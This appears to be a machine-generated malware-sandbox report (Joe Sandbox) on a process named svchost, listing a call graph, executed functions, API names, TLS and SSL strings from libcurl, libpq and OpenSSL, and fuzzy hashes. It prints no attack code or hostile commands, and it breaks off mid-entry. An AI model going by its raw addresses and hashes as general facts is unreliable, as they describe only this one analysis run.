7ffda36f4380 29 API calls 106724->106725 106726 7ffda36f36d7 106725->106726 106727 7ffda36f36e0 _errno 106726->106727 106728 7ffda36f370d 106726->106728 106730 7ffda36f36eb 106727->106730 106731 7ffda36f3703 106727->106731 106781 7ffda36f37f0 20 API calls Concurrency::details::SchedulerProxy::DeleteThis 106728->106781 106733 7ffda36f37b3 CloseHandle 106730->106733 106757 7ffda36f59c0 GetFileAttributesA 106730->106757 106732 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 106731->106732 106734 7ffda36f37ce 106732->106734 106733->106731 106734->106674 106737 7ffda36f3758 _errno 106739 7ffda36f3783 _errno 106737->106739 106740 7ffda36f3763 RtlGetLastNtStatus 106737->106740 106738 7ffda36f378e 106738->106731 106738->106733 106739->106738 106740->106739 106741 7ffda36f3770 _errno 106740->106741 106741->106738 106785 7ffda36f5e40 106742->106785 106744 7ffda36f43a0 106745 7ffda36f43a4 106744->106745 106746 7ffda36f43d7 _wassert 106744->106746 106751 7ffda36f43f1 106744->106751 106745->106674 106746->106751 106747 7ffda36f4478 CreateFileA 106748 7ffda36f44f0 106747->106748 106749 7ffda36f44a0 GetLastError 106747->106749 106748->106674 106750 7ffda36f44c6 106749->106750 106749->106751 106752 7ffda36f44cb RtlGetLastNtStatus 106750->106752 106753 7ffda36f44d8 106750->106753 106751->106747 106751->106750 106797 7ffda36f5f10 SleepEx SleepEx 106751->106797 106752->106753 106798 7ffda36f5dc0 18 API calls Concurrency::details::SchedulerProxy::DeleteThis 106753->106798 106756->106674 106758 7ffda36f5a0a 106757->106758 106759 7ffda36f59f1 GetLastError 106757->106759 106761 7ffda36f5a28 CreateFileA 106758->106761 106762 7ffda36f5a10 _errno 106758->106762 106782 7ffda36f5dc0 18 API calls Concurrency::details::SchedulerProxy::DeleteThis 106759->106782 106764 7ffda36f5a83 DeviceIoControl 106761->106764 106765 7ffda36f5a6e GetLastError 106761->106765 106763 7ffda36f59fe 106762->106763 106768 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 106763->106768 106766 7ffda36f5b52 CloseHandle 106764->106766 106767 7ffda36f5ac0 _errno GetLastError FormatMessageA libintl_gettext __acrt_iob_func 106764->106767 106783 7ffda36f5dc0 18 API calls Concurrency::details::SchedulerProxy::DeleteThis 106765->106783 106772 7ffda36f5b3a _errno 106766->106772 106773 7ffda36f5b65 WideCharToMultiByte 106766->106773 106784 7ffda36f1ab0 14 API calls Concurrency::details::SchedulerProxy::DeleteThis 106767->106784 106774 7ffda36f3751 106768->106774 106770 7ffda36f5a7b 106770->106763 106772->106770 106776 7ffda36f5ba7 106773->106776 106777 7ffda36f5b97 _errno 106773->106777 106774->106737 106774->106738 106775 7ffda36f5b26 LocalFree CloseHandle 106775->106772 106776->106770 106778 7ffda36f5bc5 isalpha 106776->106778 106777->106770 106778->106770 106779 7ffda36f5bd3 106778->106779 106779->106770 106780 7ffda36f5beb memcpy 106779->106780 106780->106770 106781->106730 106782->106763 106783->106770 106784->106775 106786 7ffda36f5e54 LoadLibraryExA 106785->106786 106787 7ffda36f5e4d 106785->106787 106788 7ffda36f5e73 GetLastError 106786->106788 106789 7ffda36f5e8d 106786->106789 106787->106744 106799 7ffda36f5dc0 18 API calls Concurrency::details::SchedulerProxy::DeleteThis 106788->106799 106790 7ffda36f5ea0 GetProcAddress 106789->106790 106794 7ffda36f5ec3 106789->106794 106790->106789 106792 7ffda36f5ee0 GetLastError 106790->106792 106800 7ffda36f5dc0 18 API calls Concurrency::details::SchedulerProxy::DeleteThis 106792->106800 106793 7ffda36f5e80 106793->106744 106794->106744 106796 7ffda36f5eed FreeLibrary 106796->106744 106797->106751 106798->106748 106799->106793 106800->106796 106801 7ffda36d4140 106811 7ffda36e2370 106801->106811 106803 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 106804 7ffda36d4dc9 106803->106804 106805 7ffda36d4150 106806 7ffda36d41fc 106805->106806 106807 7ffda36d4975 106805->106807 106809 7ffda36d497a 106805->106809 106852 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106806->106852 106807->106803 106809->106807 106853 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106809->106853 106812 7ffda36e23b6 106811->106812 106813 7ffda36e23a1 106811->106813 106815 7ffda36e23d5 memcpy 106812->106815 106816 7ffda36e240c 106812->106816 106854 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106813->106854 106815->106816 106820 7ffda36e2469 memcpy 106816->106820 106822 7ffda36e24d0 106816->106822 106823 7ffda36e2493 106816->106823 106818 7ffda36f6230 Concurrency::details::SchedulerProxy::DeleteThis 8 API calls 106819 7ffda36e280b 106818->106819 106819->106805 106820->106823 106821 7ffda36e257b WSAGetLastError 106821->106822 106824 7ffda36e25d6 106821->106824 106822->106821 106822->106824 106825 7ffda36e258a 106822->106825 106849 7ffda36e2593 106822->106849 106856 7ffda36e9f20 38 API calls Concurrency::details::SchedulerProxy::DeleteThis 106822->106856 106823->106822 106827 7ffda36e24df 106823->106827 106830 7ffda36e24be realloc 106823->106830 106826 7ffda36e23ad 106824->106826 106828 7ffda36e2626 106824->106828 106829 7ffda36e2662 _time64 106824->106829 106824->106849 106825->106849 106859 7ffda36d63c0 10 API calls 106825->106859 106826->106818 106833 7ffda36e2523 106827->106833 106837 7ffda36e2502 realloc 106827->106837 106857 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106828->106857 106834 7ffda36e26a1 select 106829->106834 106830->106822 106830->106827 106855 7ffda36ec210 free realloc memcpy free Concurrency::details::SchedulerProxy::DeleteThis 106833->106855 106839 7ffda36e2726 106834->106839 106840 7ffda36e26e1 WSAGetLastError 106834->106840 106836 7ffda36e2635 106836->106849 106858 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106836->106858 106837->106822 106837->106833 106839->106836 106839->106849 106862 7ffda36e9f20 38 API calls Concurrency::details::SchedulerProxy::DeleteThis 106839->106862 106840->106829 106843 7ffda36e26f2 WSAGetLastError 106840->106843 106841 7ffda36e2536 106841->106822 106841->106826 106860 7ffda36ec450 21 API calls Concurrency::details::SchedulerProxy::DeleteThis 106843->106860 106845 7ffda36e270d 106861 7ffda36e2d70 27 API calls Concurrency::details::SchedulerProxy::DeleteThis 106845->106861 106848 7ffda36e2762 WSAGetLastError 106848->106849 106850 7ffda36e275b 106848->106850 106849->106826 106850->106825 106850->106836 106850->106848 106863 7ffda36e9f20 38 API calls Concurrency::details::SchedulerProxy::DeleteThis 106850->106863 106852->106807 106853->106807 106854->106826 106855->106841 106856->106822 106857->106836 106858->106825 106859->106849 106860->106845 106861->106839 106862->106850 106863->106850

                                                                                            Executed Functions

                                                                                            Function 00007FFDA378BA86 Relevance: 177.7, APIs: 57, Strings: 44, Instructions: 927COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressHandleModuleProcfree
                                                                                            • String ID: $ $$$(memory blob)$(unknown)$@$AES$CHACHA20_POLY1305$ChainingModeCCM$ChainingModeGCM$CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Microsoft Unified Security Protocol Provider$P12$SCH_USE_STRONG_CRYPTO$SHA256$SHA384$Services$TLS_AES_128_CCM_8_SHA256$TLS_AES_128_CCM_SHA256$TLS_AES_128_GCM_SHA256$TLS_AES_256_GCM_SHA384$TLS_CHACHA20_POLY1305_SHA256$USE_STRONG_CRYPTO$Users$schannel: AcquireCredentialsHandle failed: %s$schannel: All available TLS 1.3 ciphers were disabled$schannel: Failed setting algorithm cipher list$schannel: Failed to get certificate from file %s, last error is 0x%lx$schannel: Failed to get certificate location or file for %s$schannel: Failed to import cert file %s, last error is 0x%lx$schannel: Failed to import cert file %s, password is bad$schannel: Failed to open cert store %lx %s, last error is 0x%lx$schannel: Failed to read cert file %s$schannel: TLS 1.3 not supported on Windows prior to 11$schannel: This version of Schannel does not support setting an algorithm cipher list and TLS 1.3 cipher list at the same time$schannel: Unknown TLS 1.3 cipher: %.*s$schannel: WARNING: This version of Schannel may negotiate a less-secure TLS version than TLS 1.3 because the user set an algorithm cipher list.$schannel: certificate format compatibility error for %s$schannel: unable to allocate memory
                                                                                            • API String ID: 3799942571-230586194
                                                                                            • Opcode ID: cd151eb02162fe162480a3690277774b33a588f8d099033d8d492b2adcfb8331
                                                                                            • Instruction ID: 1f0eb572f10a5022b7023827e84d63346ec2a4679892cc84b8d9ea0fb7bcfd55
                                                                                            • Opcode Fuzzy Hash: cd151eb02162fe162480a3690277774b33a588f8d099033d8d492b2adcfb8331
                                                                                            • Instruction Fuzzy Hash: 2A92E222B0AB8287FB518F21A8603B977A2FF44785F045135DA4D67B96DF3EE580C708
                                                                                            Function 00007FFDA36E8D70 Relevance: 149.4, APIs: 54, Strings: 31, Instructions: 692COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_get_error_errnofree$S_methodX_ctrlX_freeX_newX_set_cert_cbX_set_default_passwd_cbX_set_default_passwd_cb_userdataX_set_optionslibintl_dgettextmalloc
                                                                                            • String ID: %s/%s$0123456789.$certificate does not match private key file "%s": %s$certificate present, but not private key file "%s"$could not create SSL context: %s$could not establish SSL connection: %s$could not get home directory to locate root certificate fileEither provide the file, use the system's trusted roots with sslrootcert=system, or change sslmode to disable server certificate verification.$could not initialize SSL user "%s": %s$could not load SSL user "%s": %s$could not load private SSL key "%s" from user "%s": %s$could not load private key file "%s": %s$could not load system root certificate paths: %s$could not open certificate file "%s": %s$could not read certificate file "%s": %s$could not read private SSL key "%s" from user "%s": %s$could not read root certificate file "%s": %s$could not set SSL Server Name Indication (SNI): %s$could not set maximum SSL protocol version: %s$could not set minimum SSL protocol version: %s$could not stat private key file "%s": %m$invalid value "%s" for maximum SSL protocol version$invalid value "%s" for minimum SSL protocol version$out of memory$out of memory allocating error description$postgresql.crt$postgresql.key$private key file "%s" is not a regular file$root certificate file "%s" does not existEither provide the file, use the system's trusted roots with sslrootcert=system, or change sslmode to disable server certificate verification.$root.crl$root.crt$system
                                                                                            • API String ID: 1953776291-2113827057
                                                                                            • Opcode ID: 3bc42ec7b35e5b906b041cde520f6272f9448a04cac596296e9510dd570b6f65
                                                                                            • Instruction ID: 8ee088cbc7b0e809cd49afddde9775e9280840f9e54ce213c801ba2bc6c8b761
                                                                                            • Opcode Fuzzy Hash: 3bc42ec7b35e5b906b041cde520f6272f9448a04cac596296e9510dd570b6f65
                                                                                            • Instruction Fuzzy Hash: 8B62BF61F0F64381FE559B2594303B92393AF81B94F6C6632DA1D277DBDE2EE4098318
                                                                                            Function 00007FFDA36142D0 Relevance: 79.1, APIs: 43, Strings: 2, Instructions: 322COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 560 7ffda36142d0-7ffda361431e call 7ffda368edf0 * 2 566 7ffda3614320-7ffda3614350 ERR_new ERR_set_debug ERR_set_error 560->566 567 7ffda3614355-7ffda361436d call 7ffda3612f50 560->567 568 7ffda3614887-7ffda361489a 566->568 571 7ffda3614373-7ffda361437a call 7ffda360bff0 567->571 572 7ffda361487b 567->572 576 7ffda36143a3-7ffda36143c0 CRYPTO_zalloc 571->576 577 7ffda361437c-7ffda361439e ERR_new ERR_set_debug 571->577 574 7ffda361487d-7ffda3614882 572->574 574->568 576->572 579 7ffda36143c6-7ffda36143df CRYPTO_THREAD_lock_new 576->579 578 7ffda3614867-7ffda361486e ERR_set_error 577->578 582 7ffda3614873-7ffda3614876 call 7ffda3613a70 578->582 580 7ffda36143e1-7ffda36143e6 ERR_new 579->580 581 7ffda3614408-7ffda361440e 579->581 583 7ffda36143eb-7ffda3614403 ERR_set_debug 580->583 584 7ffda3614410-7ffda361442f CRYPTO_strdup 581->584 585 7ffda3614435-7ffda36144b9 OPENSSL_LH_new OPENSSL_LH_set_thunks 581->585 582->572 583->578 584->582 584->585 588 7ffda36144ca-7ffda36144d6 X509_STORE_new 585->588 589 7ffda36144bb-7ffda36144c5 ERR_new 585->589 590 7ffda36144ff-7ffda3614514 call 7ffda368e78e 588->590 591 7ffda36144d8-7ffda36144fa ERR_new ERR_set_debug 588->591 589->583 594 7ffda361453d-7ffda3614547 call 7ffda3610eb0 590->594 595 7ffda3614516-7ffda3614538 ERR_new ERR_set_debug 590->595 591->578 598 7ffda3614570-7ffda361457a call 7ffda3629f30 594->598 599 7ffda3614549-7ffda361454e ERR_new 594->599 595->578 603 7ffda3614588-7ffda3614592 call 7ffda362a030 598->603 604 7ffda361457c-7ffda3614586 ERR_new 598->604 600 7ffda3614553-7ffda361456b ERR_set_debug 599->600 600->578 607 7ffda36145a0-7ffda36145aa call 7ffda362a8b0 603->607 608 7ffda3614594-7ffda361459e ERR_new 603->608 604->600 611 7ffda36145b8-7ffda36145ca call 7ffda360df60 call 7ffda360e900 607->611 612 7ffda36145ac-7ffda36145b6 ERR_new 607->612 608->600 617 7ffda36145db-7ffda36145f8 call 7ffda360d360 611->617 618 7ffda36145cc-7ffda36145d6 ERR_new 611->618 612->600 621 7ffda3614609-7ffda361462f call 7ffda360df50 call 7ffda36102b0 617->621 622 7ffda36145fa-7ffda3614604 ERR_new 617->622 618->600 627 7ffda3614845-7ffda3614862 ERR_new ERR_set_debug 621->627 628 7ffda3614635-7ffda3614640 OPENSSL_sk_num 621->628 622->600 627->578 628->627 629 7ffda3614646-7ffda3614655 call 7ffda368e6a4 628->629 632 7ffda3614666-7ffda36146a3 call 7ffda361ef20 * 2 OPENSSL_sk_new_null 629->632 633 7ffda3614657-7ffda361465c ERR_new 629->633 638 7ffda36146b4-7ffda36146c3 OPENSSL_sk_new_null 632->638 639 7ffda36146a5-7ffda36146aa ERR_new 632->639 633->632 640 7ffda36146d4-7ffda36146ea CRYPTO_new_ex_data 638->640 641 7ffda36146c5-7ffda36146ca ERR_new 638->641 639->638 642 7ffda36146fb-7ffda361471c call 7ffda368e5e4 640->642 643 7ffda36146ec-7ffda36146f1 ERR_new 640->643 641->640 642->582 646 7ffda3614722-7ffda361472d 642->646 643->642 647 7ffda361472f-7ffda3614734 call 7ffda360e880 646->647 648 7ffda361473b-7ffda3614769 RAND_bytes_ex 646->648 647->648 650 7ffda36147a3 648->650 651 7ffda361476b-7ffda3614783 RAND_priv_bytes_ex 648->651 652 7ffda36147ae-7ffda36147c6 RAND_priv_bytes_ex 650->652 651->650 654 7ffda3614785-7ffda36147a1 RAND_priv_bytes_ex 651->654 655 7ffda36147c8-7ffda36147ea ERR_new ERR_set_debug 652->655 656 7ffda36147ec-7ffda36147f6 call 7ffda36341f0 652->656 654->650 654->652 655->578 659 7ffda3614807-7ffda3614843 call 7ffda36204f0 656->659 660 7ffda36147f8-7ffda36147fd ERR_new 656->660 659->574 660->659
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debugR_set_error
                                                                                            • String ID: SSL_CTX_new_ex$ssl\ssl_lib.c
                                                                                            • API String ID: 1552677711-2988157636
                                                                                            • Opcode ID: 2d18674f58328bab6f3900cf6a3c4050cfb0983589f8cdbd3d48ee3dfe0e78b7
                                                                                            • Instruction ID: 11201559df47d48b3c7a43ced28ba5165ed691780b97370b747e9fa20a03a94a
                                                                                            • Opcode Fuzzy Hash: 2d18674f58328bab6f3900cf6a3c4050cfb0983589f8cdbd3d48ee3dfe0e78b7
                                                                                            • Instruction Fuzzy Hash: F7E18E21B0F78382FB51AB6194723B922A7AF45784F4C6035D94D677CBEE3EE4018319
                                                                                            Function 00007FFDA3610EB0 Relevance: 65.1, APIs: 23, Strings: 14, Instructions: 313COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 663 7ffda3610eb0-7ffda3610eeb call 7ffda368edf0 666 7ffda3610ef0-7ffda3610ef5 663->666 667 7ffda3610f16-7ffda3610f22 666->667 668 7ffda3610ef7-7ffda3610f01 call 7ffda361ee40 666->668 667->666 669 7ffda3610f24-7ffda3610f3c 667->669 672 7ffda3610f06-7ffda3610f0c 668->672 671 7ffda3610f40-7ffda3610f59 call 7ffda361ef20 669->671 676 7ffda3610f65-7ffda3610f6f EVP_MD_get_size 671->676 677 7ffda3610f5b-7ffda3610f63 671->677 672->667 673 7ffda3610f0e-7ffda3610f10 672->673 673->667 679 7ffda36113ae-7ffda36113c0 676->679 680 7ffda3610f75-7ffda3610f77 676->680 678 7ffda3610f7a-7ffda3610f89 677->678 678->671 681 7ffda3610f8b-7ffda3610fb0 ERR_set_mark EVP_SIGNATURE_fetch 678->681 680->678 682 7ffda3610fb2-7ffda3610fb9 681->682 683 7ffda3610fbb-7ffda3610fbe call 7ffda368e524 681->683 684 7ffda3610fc3-7ffda3610fdc EVP_KEYEXCH_fetch 682->684 683->684 686 7ffda3610fde-7ffda3610fe8 684->686 687 7ffda3610fea-7ffda3610fed call 7ffda368e530 684->687 688 7ffda3610ff2-7ffda361100b EVP_KEYEXCH_fetch 686->688 687->688 690 7ffda361100d-7ffda3611017 688->690 691 7ffda3611019-7ffda361101c EVP_KEYEXCH_free 688->691 692 7ffda3611021-7ffda361103a EVP_SIGNATURE_fetch 690->692 691->692 693 7ffda3611045-7ffda3611048 EVP_SIGNATURE_free 692->693 694 7ffda361103c-7ffda3611043 692->694 695 7ffda361104d-7ffda36110ad ERR_pop_to_mark EVP_PKEY_asn1_find_str 693->695 694->695 696 7ffda36110af-7ffda36110cc EVP_PKEY_asn1_get0_info 695->696 697 7ffda36110d2-7ffda36110e6 call 7ffda3633eb0 695->697 696->697 698 7ffda36110ce 696->698 701 7ffda36110f5 697->701 702 7ffda36110e8-7ffda36110f3 697->702 698->697 703 7ffda36110fc-7ffda361111d EVP_PKEY_asn1_find_str 701->703 702->703 704 7ffda361111f-7ffda361113c EVP_PKEY_asn1_get0_info 703->704 705 7ffda3611142-7ffda3611156 call 7ffda3633eb0 703->705 704->705 706 7ffda361113e 704->706 709 7ffda3611165 705->709 710 7ffda3611158-7ffda3611163 705->710 706->705 711 7ffda361116f-7ffda3611190 EVP_PKEY_asn1_find_str 709->711 710->711 712 7ffda3611192-7ffda36111af EVP_PKEY_asn1_get0_info 711->712 713 7ffda36111b5-7ffda36111c9 call 7ffda3633eb0 711->713 712->713 714 7ffda36111b1 712->714 717 7ffda36111d8 713->717 718 7ffda36111cb-7ffda36111d6 713->718 714->713 719 7ffda36111e2-7ffda3611203 EVP_PKEY_asn1_find_str 717->719 718->719 720 7ffda3611205-7ffda3611222 EVP_PKEY_asn1_get0_info 719->720 721 7ffda3611228-7ffda361123c call 7ffda3633eb0 719->721 720->721 722 7ffda3611224 720->722 725 7ffda361123e-7ffda3611249 721->725 726 7ffda361124b 721->726 722->721 727 7ffda3611255-7ffda3611276 EVP_PKEY_asn1_find_str 725->727 726->727 728 7ffda3611278-7ffda3611295 EVP_PKEY_asn1_get0_info 727->728 729 7ffda361129b-7ffda36112a8 call 7ffda3633eb0 727->729 728->729 730 7ffda3611297 728->730 733 7ffda36112b4-7ffda36112d5 EVP_PKEY_asn1_find_str 729->733 734 7ffda36112aa 729->734 730->729 735 7ffda36112d7-7ffda36112f4 EVP_PKEY_asn1_get0_info 733->735 736 7ffda36112fa-7ffda3611307 call 7ffda3633eb0 733->736 734->733 735->736 737 7ffda36112f6 735->737 740 7ffda3611313-7ffda3611334 EVP_PKEY_asn1_find_str 736->740 741 7ffda3611309 736->741 737->736 742 7ffda3611336-7ffda3611353 EVP_PKEY_asn1_get0_info 740->742 743 7ffda3611359-7ffda3611366 call 7ffda3633eb0 740->743 741->740 742->743 744 7ffda3611355 742->744 747 7ffda3611372-7ffda3611381 743->747 748 7ffda3611368 743->748 744->743 749 7ffda3611383 747->749 750 7ffda361138a-7ffda361138c 747->750 748->747 749->750 751 7ffda361138e 750->751 752 7ffda3611398-7ffda36113ad 750->752 751->752
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Y_asn1_find_strY_asn1_get0_info$E_fetchH_fetchR_pop_to_markR_set_mark$D_get_sizeE_freeH_freeJ_nid2snR_fetch
                                                                                            • String ID: $ $ $ $DSA$ECDH$ECDSA$gost-mac$gost-mac-12$gost2001$gost2012_256$gost2012_512$kuznyechik-mac$magma-mac
                                                                                            • API String ID: 2321393641-365409564
                                                                                            • Opcode ID: 268b19889cf02bf0f91517eb74db770bd30f83b64ba60b829bfd315cebd91123
                                                                                            • Instruction ID: 422108d8d880c3dd3e0e6a9ffe49dc234633aa084c14d6f4d3e09dea27fa972c
                                                                                            • Opcode Fuzzy Hash: 268b19889cf02bf0f91517eb74db770bd30f83b64ba60b829bfd315cebd91123
                                                                                            • Instruction Fuzzy Hash: FFE19E72B0AB9286F7508F24D4616A937A2FB44758F082135FE4D5779AEF3AE490C708
                                                                                            Function 00007FFDA377B470 Relevance: 49.2, APIs: 19, Strings: 9, Instructions: 177libraryloadernetworkCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 938 7ffda377b470-7ffda377b48c 939 7ffda377b48e-7ffda377b4a0 WSAStartup 938->939 940 7ffda377b4d6-7ffda377b4dd call 7ffda3742e70 938->940 941 7ffda377b4a2-7ffda377b4a9 939->941 942 7ffda377b4b9-7ffda377b4d5 call 7ffda3795780 939->942 948 7ffda377b4e3-7ffda377b510 GetModuleHandleW 940->948 949 7ffda377b76c-7ffda377b783 call 7ffda3795780 940->949 944 7ffda377b4b3 WSACleanup 941->944 945 7ffda377b4ab-7ffda377b4b1 941->945 944->942 945->940 945->944 951 7ffda377b512-7ffda377b519 948->951 952 7ffda377b51e-7ffda377b553 GetProcAddress wcspbrk 948->952 954 7ffda377b69e-7ffda377b6c1 GetModuleHandleA 951->954 955 7ffda377b57d-7ffda377b580 952->955 956 7ffda377b555-7ffda377b55b 952->956 958 7ffda377b6c3-7ffda377b701 GetProcAddress * 3 954->958 959 7ffda377b708-7ffda377b76a call 7ffda3787db0 * 2 QueryPerformanceFrequency 954->959 962 7ffda377b582-7ffda377b595 GetProcAddress 955->962 963 7ffda377b5ac-7ffda377b5c3 GetSystemDirectoryW 955->963 960 7ffda377b56f-7ffda377b578 LoadLibraryW 956->960 961 7ffda377b55d-7ffda377b56a 956->961 958->959 959->949 965 7ffda377b66e-7ffda377b680 960->965 961->965 962->963 966 7ffda377b597-7ffda377b5a7 LoadLibraryExW 962->966 967 7ffda377b5c9-7ffda377b5e0 malloc 963->967 968 7ffda377b666 963->968 965->954 971 7ffda377b682-7ffda377b695 GetProcAddress 965->971 966->965 972 7ffda377b5e2-7ffda377b5f0 GetSystemDirectoryW 967->972 973 7ffda377b65d-7ffda377b660 free 967->973 968->965 971->954 975 7ffda377b697 971->975 972->973 976 7ffda377b5f2-7ffda377b5fc 972->976 973->968 975->954 978 7ffda377b600-7ffda377b609 976->978 978->978 979 7ffda377b60b 978->979 980 7ffda377b612-7ffda377b619 979->980 980->980 981 7ffda377b61b-7ffda377b628 980->981 982 7ffda377b630-7ffda377b63e 981->982 982->982 983 7ffda377b640-7ffda377b646 982->983 984 7ffda377b654 LoadLibraryW 983->984 985 7ffda377b648-7ffda377b652 983->985 986 7ffda377b65a 984->986 985->986 986->973
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad$DirectoryHandleModuleSystem$CleanupFrequencyPerformanceQueryStartupfreemallocwcspbrk
                                                                                            • String ID: AddDllDirectory$FreeAddrInfoExW$GetAddrInfoExCancel$GetAddrInfoExW$LoadLibraryExW$if_nametoindex$iphlpapi.dll$kernel32$ws2_32
                                                                                            • API String ID: 1741924799-1796637598
                                                                                            • Opcode ID: 2697f331b37d98f652b4482058136af72a4de187b0d93a3241bab0ceee7d76f6
                                                                                            • Instruction ID: 73009f66ae22aace9264cedb357590652a338206d6afbf4a106f0cd761b6ead7
                                                                                            • Opcode Fuzzy Hash: 2697f331b37d98f652b4482058136af72a4de187b0d93a3241bab0ceee7d76f6
                                                                                            • Instruction Fuzzy Hash: 98817421B0AA8682FB619F15E43537933A3BF89B84F444135C94E677A6EF7EE405C708
                                                                                            Function 00007FFDA3732B20 Relevance: 46.8, APIs: 31, Instructions: 251synchronizationCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
